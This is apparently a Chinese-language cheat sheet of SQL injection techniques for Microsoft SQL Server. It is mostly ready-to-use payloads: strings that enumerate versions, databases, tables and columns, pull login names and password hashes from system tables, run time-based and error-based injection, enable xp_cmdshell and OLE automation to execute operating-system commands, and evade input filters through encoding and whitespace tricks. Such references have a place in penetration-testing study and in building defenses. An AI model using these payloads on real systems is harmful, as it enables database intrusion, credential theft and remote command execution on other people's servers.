数据库的一些注入技巧-sqlserver
- 2019 年 11 月 5 日
- 笔记
默认数据库
|
pubs |
MSSQL 2005版本以上不支持 |
|---|---|
|
model |
支持所有版本 |
|
msdb |
支持所有版本 |
|
tempdb |
支持所有版本 |
|
northwind |
支持所有版本 |
|
information_schema |
支持MSSQL 2000及以上版本 |
注释
|
/* |
|---|
|
— |
|
;%00 |
SELECT * FROM Users WHERE username = '' OR 1=1 —' AND password ='';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
查询版本信息
@@VERSION
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE'%2008%';
查询数据库凭证
|
Database..Table |
master..syslogins, master..sysprocesses |
|---|---|
|
Columns |
name, loginame |
|
Current User |
user, system_user, suser_sname(), is_srvrolemember('sysadmin') |
|
Database Credentials |
SELECT user, password FROM master.dbo.sysxlogins |
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE'0' END);
查询数据库信息
|
Database.Table |
master..sysdatabases |
|---|---|
|
Column |
name |
|
Current DB |
DB_NAME(i) |
· SELECT DB_NAME(5);
· SELECT name FROM master..sysdatabases;
查询主机名称
|
@@SERVERNAME |
|---|
|
SERVERPROPERTY() |
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');
查询表和列
确定列数
ORDER BY n+1;
漏洞语句:
SELECT username, password, permission FROM UsersWHERE id = '1';
查询列数如下:
|
1' ORDER BY 1– |
True |
|---|---|
|
1' ORDER BY 2– |
True |
|
1' ORDER BY 3– |
True |
|
1' ORDER BY 4– |
False – Query is only using 3 columns |
|
-1' UNION SELECT 1,2,3– |
True |
查询列
GROUP BY / HAVING
漏洞语句:
SELECT username,password, permission FROM Users WHERE id = '1';
注入语句:
|
1' HAVING 1=1– |
Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. |
|---|---|
|
1' GROUP BY username HAVING 1=1– |
Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. |
|
1' GROUP BY username, password HAVING 1=1– |
Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. |
|
1' GROUP BY username, password, permission HAVING 1=1– |
No Error |
查询表
从以下两个数据库中查询表信息:
information_schema.tables、master..sysobjects
联合查询
|
UNION SELECT name FROM master..sysobjects WHERE xtype='U' |
|---|
布尔查询
|
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' |
|---|
报错查询
|
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) |
|---|
|
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) |
查询列
从以下两个数据库中查询表信息:
information_schema.columns 、 masters..syscolumns
联合查询
UNION SELECT nameFROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHEREname = 'tablename')
布尔查询
AND SELECT SUBSTRING(column_name,1,1) FROMinformation_schema.columns > 'A'
报错查询
|
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) |
|---|
|
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) |
检索多个表/列
1、
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET@xy=':' SELECT @xy=@xy+' '+name FROMsysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
2、
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROMTMP_DB);
3、
AND 1=0; DROP TABLE TMP_DB;
SQL Server 2005版本以上适用
|
SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('') |
|---|
储存过程查询:
' AND 1=0; DECLARE @S VARCHAR(4000) SET@S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);–
避免单引号
|
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) |
|---|
字符串拼接
|
SELECT CONCAT('a','a','a'); (SQL SERVER 2012) |
|---|
|
SELECT 'a'+'d'+'mi'+'n'; |
条件判断
|
IF |
|---|
|
CASE |
IF 1=1 SELECT'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;
时间注入
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFORDELAY '0:0:0';
执行命令
EXEC master.dbo.xp_cmdshell 'cmd';
mssql 2005默认禁用xp_cmdshell,用以下语句开启:
|
EXEC sp_configure 'show advanced options', 1 |
|---|
|
EXEC sp_configure reconfigure |
|
EXEC sp_configure 'xp_cmdshell', 1 |
|
EXEC sp_configure reconfigure |
调用wscript执行命令:
|
DECLARE @execmd INT |
|---|
|
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT |
|
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c echo jumbo' |
如果版本高于sql 2000,需要执行其他查询才能执行上一条命令:
|
EXEC sp_configure 'show advanced options', 1 |
|---|
|
EXEC sp_configure reconfigure |
|
EXEC sp_configure 'OLE Automation Procedures', 1 |
|
EXEC sp_configure reconfigure |
例:
1、把命令结果存入tmp_db
' IF EXISTS (SELECT 1 FROMINFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE@a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGINCREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_valueint, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGINCREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXECmaster..xp_cmdshell 'dir' SELECT @a='' SELECT@a=Replace(@a%2B'<br></font><fontcolor="black">'%2Bdir,'<dir>','</font><fontcolor="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23DataEND ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSESELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB–
2、从tmp_db查询内容:
' UNION SELECT tbl FROM TMP_DB–
3、删除tmp_db
' DROP TABLE TMP_DB–
多语句查询
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES('value1', 'value2');
混淆
以下字符等同于空
|
01 |
|---|
|
02 |
|
03 |
|
04 |
|
05 |
|
06 |
|
07 |
|
08 |
|
09 |
|
0A |
|
0B |
|
0C |
|
0D |
|
0E |
|
0F |
|
10 |
|
11 |
|
12 |
|
13 |
|
14 |
|
15 |
|
16 |
|
17 |
|
18 |
|
19 |
|
1A |
|
1B |
|
1C |
|
1D |
|
1E |
|
1F |
|
20 |
|
25 |
S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
%仅限于ASP(x)环境
以下字符代替空格
|
22 |
" |
|---|---|
|
28 |
( |
|
29 |
) |
|
5B |
[ |
|
5D |
] |
UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information_schema].[tables];
and/or之后可以使用的符号
|
01 – 20 |
Range |
|---|---|
|
21 |
! |
|
2B |
+ |
|
2D |
– |
|
2E |
. |
|
5C |
|
|
7E |
~ |
SELECT 1FROM[table]WHERE1=1AND1=1;
编码
|
URL Encoding |
SELECT %74able_%6eame FROM information_schema.tables; |
|---|---|
|
Double URL Encoding |
SELECT %2574able_%256eame FROM information_schema.tables; |
|
Unicode Encoding |
SELECT %u0074able_%u6eame FROM information_schema.tables; |
|
Invalid Hex Encoding (ASP) |
SELECT %tab%le_%na%me FROM information_schema.tables; |
|
Hex Encoding |
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);– |
|
HTML Entities (Needs to be verified) |
%26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B |
